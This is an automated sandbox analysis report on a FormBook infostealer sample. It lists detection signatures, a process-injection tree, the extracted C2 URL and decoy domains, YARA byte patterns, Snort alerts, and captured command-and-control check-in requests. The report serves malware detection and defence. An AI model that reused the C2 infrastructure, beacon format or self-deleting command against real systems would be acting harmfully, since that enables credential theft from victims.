Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report s6G3ZtvHZg.exe

Overview

General Information

Sample Name:s6G3ZtvHZg.exe
Analysis ID:385308
MD5:885e567660a28ec23b692291587ef69f
SHA1:9e200dd274b4be5df241719fe72f6403938a8561
SHA256:fb23a007cf696e3c6b119c61b62824abc56b47a7e2f82337e890acc9024bd88c
Tags:exeFormbook
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM3
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • s6G3ZtvHZg.exe (PID: 6076 cmdline: 'C:\Users\user\Desktop\s6G3ZtvHZg.exe' MD5: 885E567660A28EC23B692291587EF69F)
    • s6G3ZtvHZg.exe (PID: 6328 cmdline: C:\Users\user\Desktop\s6G3ZtvHZg.exe MD5: 885E567660A28EC23B692291587EF69F)
    • s6G3ZtvHZg.exe (PID: 6336 cmdline: C:\Users\user\Desktop\s6G3ZtvHZg.exe MD5: 885E567660A28EC23B692291587EF69F)
      • explorer.exe (PID: 3292 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • help.exe (PID: 7084 cmdline: C:\Windows\SysWOW64\help.exe MD5: 09A715036F14D3632AD03B52D1DA6BFF)
          • cmd.exe (PID: 2888 cmdline: /c del 'C:\Users\user\Desktop\s6G3ZtvHZg.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 4456 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.okitmall.com/iu4d/"], "decoy": ["abbottdigitalhealthpass.com", "peridot.website", "emmajanetracy.com", "arewedoingenough.com", "mvprunning.com", "xn--939au40bijas7ab2a93s.com", "thehouseofchiron.com", "sqzffn.com", "moretuantired.com", "rosewoodcibubur.com", "warungjitu.com", "armylord.net", "rideequihome.com", "girasol.zone", "getboostphlo.com", "bilradioplaza.com", "japannxt.com", "figulco.com", "insershop.com", "loktantratvnews.com", "healthdatamonitoring.com", "gmopanama.com", "miguelchulia.com", "appexivo.com", "weluvweb.com", "qqcaotv.com", "aleyalifestyle.com", "aratssycosmetics.com", "chestfreezersale.xyz", "gyanumbrella.com", "betbonusuk.com", "dostforimpact.net", "lestlondon.com", "theartsutra.com", "finegiant.com", "zacharypelletier.com", "ux300e.com", "wiglous.club", "adamspartnership.com", "contex33.xyz", "appearwood.club", "3m-mat.com", "runcouver.com", "cqsjny.com", "totubemp3.net", "imagecloudhost.com", "appleadayjuice.com", "energyoutline.com", "yashaerotech.com", "mcleancosmeticgynecology.com", "georgicarealty.com", "sellbulkweed.com", "kardosystems.com", "hubsnewz.com", "ekstrafordunyasi.com", "cymentor.com", "morrealeestates.com", "mumbaihotgirls.club", "beaulaser.com", "aa29996.com", "ankaramasozlerburada.xyz", "otmcleaningservice.com", "rosaandray.com", "omxpro.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000E.00000002.505721374.0000000000A00000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    0000000E.00000002.505721374.0000000000A00000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    0000000E.00000002.505721374.0000000000A00000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x166a9:$sqlite3step: 68 34 1C 7B E1
    • 0x167bc:$sqlite3step: 68 34 1C 7B E1
    • 0x166d8:$sqlite3text: 68 38 2A 90 C5
    • 0x167fd:$sqlite3text: 68 38 2A 90 C5
    • 0x166eb:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16813:$sqlite3blob: 68 53 D8 7F 8C
    0000000E.00000002.504313193.0000000000390000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      0000000E.00000002.504313193.0000000000390000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 18 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      3.2.s6G3ZtvHZg.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        3.2.s6G3ZtvHZg.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        3.2.s6G3ZtvHZg.exe.400000.0.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x166a9:$sqlite3step: 68 34 1C 7B E1
        • 0x167bc:$sqlite3step: 68 34 1C 7B E1
        • 0x166d8:$sqlite3text: 68 38 2A 90 C5
        • 0x167fd:$sqlite3text: 68 38 2A 90 C5
        • 0x166eb:$sqlite3blob: 68 53 D8 7F 8C
        • 0x16813:$sqlite3blob: 68 53 D8 7F 8C
        3.2.s6G3ZtvHZg.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          3.2.s6G3ZtvHZg.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x77e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x7b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x13885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x13371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x13987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x13aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x858a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x125ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0x9302:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x18977:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x19a1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 1 entries

          Sigma Overview

          No Sigma rule has matched

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 0000000E.00000002.505721374.0000000000A00000.00000040.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.okitmall.com/iu4d/"], "decoy": ["abbottdigitalhealthpass.com", "peridot.website", "emmajanetracy.com", "arewedoingenough.com", "mvprunning.com", "xn--939au40bijas7ab2a93s.com", "thehouseofchiron.com", "sqzffn.com", "moretuantired.com", "rosewoodcibubur.com", "warungjitu.com", "armylord.net", "rideequihome.com", "girasol.zone", "getboostphlo.com", "bilradioplaza.com", "japannxt.com", "figulco.com", "insershop.com", "loktantratvnews.com", "healthdatamonitoring.com", "gmopanama.com", "miguelchulia.com", "appexivo.com", "weluvweb.com", "qqcaotv.com", "aleyalifestyle.com", "aratssycosmetics.com", "chestfreezersale.xyz", "gyanumbrella.com", "betbonusuk.com", "dostforimpact.net", "lestlondon.com", "theartsutra.com", "finegiant.com", "zacharypelletier.com", "ux300e.com", "wiglous.club", "adamspartnership.com", "contex33.xyz", "appearwood.club", "3m-mat.com", "runcouver.com", "cqsjny.com", "totubemp3.net", "imagecloudhost.com", "appleadayjuice.com", "energyoutline.com", "yashaerotech.com", "mcleancosmeticgynecology.com", "georgicarealty.com", "sellbulkweed.com", "kardosystems.com", "hubsnewz.com", "ekstrafordunyasi.com", "cymentor.com", "morrealeestates.com", "mumbaihotgirls.club", "beaulaser.com", "aa29996.com", "ankaramasozlerburada.xyz", "otmcleaningservice.com", "rosaandray.com", "omxpro.com"]}
          Multi AV Scanner detection for submitted fileShow sources
          Source: s6G3ZtvHZg.exeVirustotal: Detection: 27%Perma Link
          Source: s6G3ZtvHZg.exeReversingLabs: Detection: 25%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 0000000E.00000002.505721374.0000000000A00000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.504313193.0000000000390000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.254514103.0000000003A7A000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.293813367.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.505963948.0000000000A30000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.294200227.0000000001260000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.294175313.0000000001230000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 3.2.s6G3ZtvHZg.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.s6G3ZtvHZg.exe.400000.0.unpack, type: UNPACKEDPE
          Machine Learning detection for sampleShow sources
          Source: s6G3ZtvHZg.exeJoe Sandbox ML: detected
          Source: 3.2.s6G3ZtvHZg.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: s6G3ZtvHZg.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: s6G3ZtvHZg.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: wntdll.pdbUGP source: s6G3ZtvHZg.exe, 00000003.00000002.294291430.0000000001710000.00000040.00000001.sdmp, help.exe, 0000000E.00000002.507433539.0000000002DA0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: s6G3ZtvHZg.exe, help.exe
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 4x nop then pop edi3_2_00416277
          Source: C:\Windows\SysWOW64\help.exeCode function: 4x nop then pop edi14_2_003A6277

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49719 -> 104.21.7.67:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49719 -> 104.21.7.67:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49719 -> 104.21.7.67:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49721 -> 3.13.255.157:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49721 -> 3.13.255.157:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49721 -> 3.13.255.157:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49740 -> 52.58.78.16:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49740 -> 52.58.78.16:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49740 -> 52.58.78.16:80
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.okitmall.com/iu4d/
          Performs DNS queries to domains with low reputationShow sources
          Source: C:\Windows\explorer.exeDNS query: www.chestfreezersale.xyz
          Source: global trafficHTTP traffic detected: GET /iu4d/?uVjL=M6NHp&J6A=JOOHHYcCVAiumnatH9FSz+DjDh0K1BlAW5euFZ4O/VfuOjdNwQJji3cnAkHedg7IWrAc+UUQ6A== HTTP/1.1Host: www.emmajanetracy.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /iu4d/?uVjL=M6NHp&J6A=aMD/FfTIFdO3dQr6MUn+t3qhrpMUQuV8ueOBsAqsCPdFlO5Mvx0OM51UzrMOHcRpnHSJ7V9dZA== HTTP/1.1Host: www.okitmall.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /iu4d/?J6A=t0/ehB6/LVvHYU10SpQGBhUGrinUOeav3QqKXry454rcMit/5rlSGcY6Hhw179fg+WUV7s8SGg==&uVjL=M6NHp HTTP/1.1Host: www.moretuantired.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /iu4d/?uVjL=M6NHp&J6A=FEKq/YHm5wXdiXZSfMYU5a3fJJzC9VYlasV/QaqgSPDk7XU2aTMqxEbJbT4EZiZV5QP8ot7STQ== HTTP/1.1Host: www.betbonusuk.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /iu4d/?J6A=p+YVWX5eE4Rg8cIpgLWCUqreCa5cO9ffVLN3OauOR6vO7HZOR4KqCsCqkB1fyJC1oU39P3kn3g==&uVjL=M6NHp HTTP/1.1Host: www.weluvweb.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /iu4d/?uVjL=M6NHp&J6A=k0teHmEV2/zmOBpTxqI3H5Y5oaIRcTZxO4xmkSNbfQsiDPlSSPS4pf83qXUKBn/nYITInLUVzg== HTTP/1.1Host: www.warungjitu.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /iu4d/?uVjL=M6NHp&J6A=quJ3uSLzhXOR+OCBqveBVSLwWtpx0cb154Cx1Wq/f+1xYAHW6pDvZEyzwff3Do7t5v8+AMWbMw== HTTP/1.1Host: www.appearwood.clubConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /iu4d/?J6A=/9OusRTTk+V39FQseUb+U2Ojje2+Fc0M9rZrn6A+Wz352TzRXVRSZ625FgSAuh9Pz9OXstBPtg==&uVjL=M6NHp HTTP/1.1Host: www.theartsutra.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /iu4d/?uVjL=M6NHp&J6A=A35kX2qXHT11q/n/cs4iUbUQYnF9cz7N4ymZ2B1O+tarurGCDYOUJTJ/gp5jdduweflW0nZeQg== HTTP/1.1Host: www.chestfreezersale.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /iu4d/?uVjL=M6NHp&J6A=JOOHHYcCVAiumnatH9FSz+DjDh0K1BlAW5euFZ4O/VfuOjdNwQJji3cnAkHedg7IWrAc+UUQ6A== HTTP/1.1Host: www.emmajanetracy.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 192.0.78.25 192.0.78.25
          Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
          Source: Joe Sandbox ViewASN Name: AUTOMATTICUS AUTOMATTICUS
          Source: global trafficHTTP traffic detected: GET /iu4d/?uVjL=M6NHp&J6A=JOOHHYcCVAiumnatH9FSz+DjDh0K1BlAW5euFZ4O/VfuOjdNwQJji3cnAkHedg7IWrAc+UUQ6A== HTTP/1.1Host: www.emmajanetracy.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /iu4d/?uVjL=M6NHp&J6A=aMD/FfTIFdO3dQr6MUn+t3qhrpMUQuV8ueOBsAqsCPdFlO5Mvx0OM51UzrMOHcRpnHSJ7V9dZA== HTTP/1.1Host: www.okitmall.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /iu4d/?J6A=t0/ehB6/LVvHYU10SpQGBhUGrinUOeav3QqKXry454rcMit/5rlSGcY6Hhw179fg+WUV7s8SGg==&uVjL=M6NHp HTTP/1.1Host: www.moretuantired.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /iu4d/?uVjL=M6NHp&J6A=FEKq/YHm5wXdiXZSfMYU5a3fJJzC9VYlasV/QaqgSPDk7XU2aTMqxEbJbT4EZiZV5QP8ot7STQ== HTTP/1.1Host: www.betbonusuk.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /iu4d/?J6A=p+YVWX5eE4Rg8cIpgLWCUqreCa5cO9ffVLN3OauOR6vO7HZOR4KqCsCqkB1fyJC1oU39P3kn3g==&uVjL=M6NHp HTTP/1.1Host: www.weluvweb.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /iu4d/?uVjL=M6NHp&J6A=k0teHmEV2/zmOBpTxqI3H5Y5oaIRcTZxO4xmkSNbfQsiDPlSSPS4pf83qXUKBn/nYITInLUVzg== HTTP/1.1Host: www.warungjitu.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /iu4d/?uVjL=M6NHp&J6A=quJ3uSLzhXOR+OCBqveBVSLwWtpx0cb154Cx1Wq/f+1xYAHW6pDvZEyzwff3Do7t5v8+AMWbMw== HTTP/1.1Host: www.appearwood.clubConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /iu4d/?J6A=/9OusRTTk+V39FQseUb+U2Ojje2+Fc0M9rZrn6A+Wz352TzRXVRSZ625FgSAuh9Pz9OXstBPtg==&uVjL=M6NHp HTTP/1.1Host: www.theartsutra.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /iu4d/?uVjL=M6NHp&J6A=A35kX2qXHT11q/n/cs4iUbUQYnF9cz7N4ymZ2B1O+tarurGCDYOUJTJ/gp5jdduweflW0nZeQg== HTTP/1.1Host: www.chestfreezersale.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /iu4d/?uVjL=M6NHp&J6A=JOOHHYcCVAiumnatH9FSz+DjDh0K1BlAW5euFZ4O/VfuOjdNwQJji3cnAkHedg7IWrAc+UUQ6A== HTTP/1.1Host: www.emmajanetracy.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.emmajanetracy.com
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 12 Apr 2021 08:03:45 GMTServer: ApacheX-Powered-By: PHP/5.6.36X-Frame-Options: SAMEORIGINCache-Control: No-CacheConnection: closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 31 65 30 34 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6b 72 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 33 36 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 66 6f 72 6d 61 74 2d 64 65 74 65 63 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 6c 65 70 68 6f 6e 65 3d 6e 6f 22 20 2f 3e 0a 09 09 09 09 3c 74 69 74 6c 65 3e ed 86 b5 ed 95 a9 eb b3 b4 ed 97 98 20 eb b9 84 ea b5 90 ea b2 ac ec a0 81 ec 82 ac ec 9d b4 ed 8a b8 3c 2f 74 69 74 6c 65 3e 0a 0a 09 09 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 31 2e 31 31 2e 32 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 51 75 65 72 79 2e 73 65 72 69 61 6c 69 7a 65 4f 62 6a 65 63 74 2f 32 2e 30 2e 33 2f 6a 71 75 65 72 79 2e 73 65 72 69 61 6c 69 7a 65 4f 62 6a 65 63 74 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 73 6f 6e 33 2f 33 2e 33 2e 32 2f 6a 73 6f 6e 33 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 6a 51 75 65 72 79 28 66 75 6e 63 74 69 6f 6e 28 24 29 20 7b 0a 20 20 20 20 20 20 24 66 6f 72 6d 20 3d 20 24 28 27 2e 70 75 72 65 2d 66 6f 72 6d 27 29 3b 0a 20 20 20 20 20 20 24 66 6f 72 6d 2e 73 75 62 6d 69 74 28 66 75 6e 63 74 69 6f 6e 28 65 29 20 7b 0a 20 20 20 20 20 20 20 20 76 61 72 20 24 74 68 69 73 20 3d 20 24 28 74 68 69 73 29 3b 0a 0a 09 09 76 61 72 20 66 20 3d 20 74 68 69 73 3b 0a 0a 09 09 69 66 20 28 66 2e 61 67 72 65 65 2e 63 68 65 63 6b 65 64 20 3d 3d 20 66 61 6c 73 65 29 0a 09 09 09 7b 0a 09 09 09 09 61 6c 65 72 74 28 27 ea b0 9c ec 9d b8 ec a0 95 eb b3 b4 ec b7 a8 ea b8 89 eb b0 a9 ec b9 a8 ec 97 90 20 eb 8f 99 ec 9d 98 ed 95 b4 20 ec a3 bc ec 84 b8 ec 9a 94 2e 27 29 3b 0a 09 09 09 09 66 2e 61 67 72 65 65 2e 66 6f 63 75 73 28 29 3b 0a 09 09 09 09 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 0a 09 09 09 7d 0a 0a 09 09 09 09 69 66 20 28 66 2e 63 75 73 74 6f 6d 65 72 5f 6e 61 6d 65 2e 76 61 6c 75 65 20 3d 3d 20 22 22 29 0a 09 09 09 7b 0a 09 09 09 0
          Source: s6G3ZtvHZg.exe, 00000000.00000002.255876362.0000000005940000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.279202038.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: s6G3ZtvHZg.exe, 00000000.00000002.252345146.00000000028D1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: s6G3ZtvHZg.exe, 00000000.00000002.255876362.0000000005940000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.279202038.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000004.00000000.272051627.0000000006840000.00000004.00000001.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
          Source: s6G3ZtvHZg.exe, 00000000.00000002.255876362.0000000005940000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.279202038.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: s6G3ZtvHZg.exe, 00000000.00000002.255876362.0000000005940000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.279202038.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000004.00000000.279202038.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: s6G3ZtvHZg.exe, 00000000.00000002.255876362.0000000005940000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.279202038.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: s6G3ZtvHZg.exe, 00000000.00000002.255876362.0000000005940000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.279202038.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: s6G3ZtvHZg.exe, 00000000.00000002.255876362.0000000005940000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.279202038.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: s6G3ZtvHZg.exe, 00000000.00000002.255876362.0000000005940000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.279202038.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: s6G3ZtvHZg.exe, 00000000.00000002.255876362.0000000005940000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.279202038.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
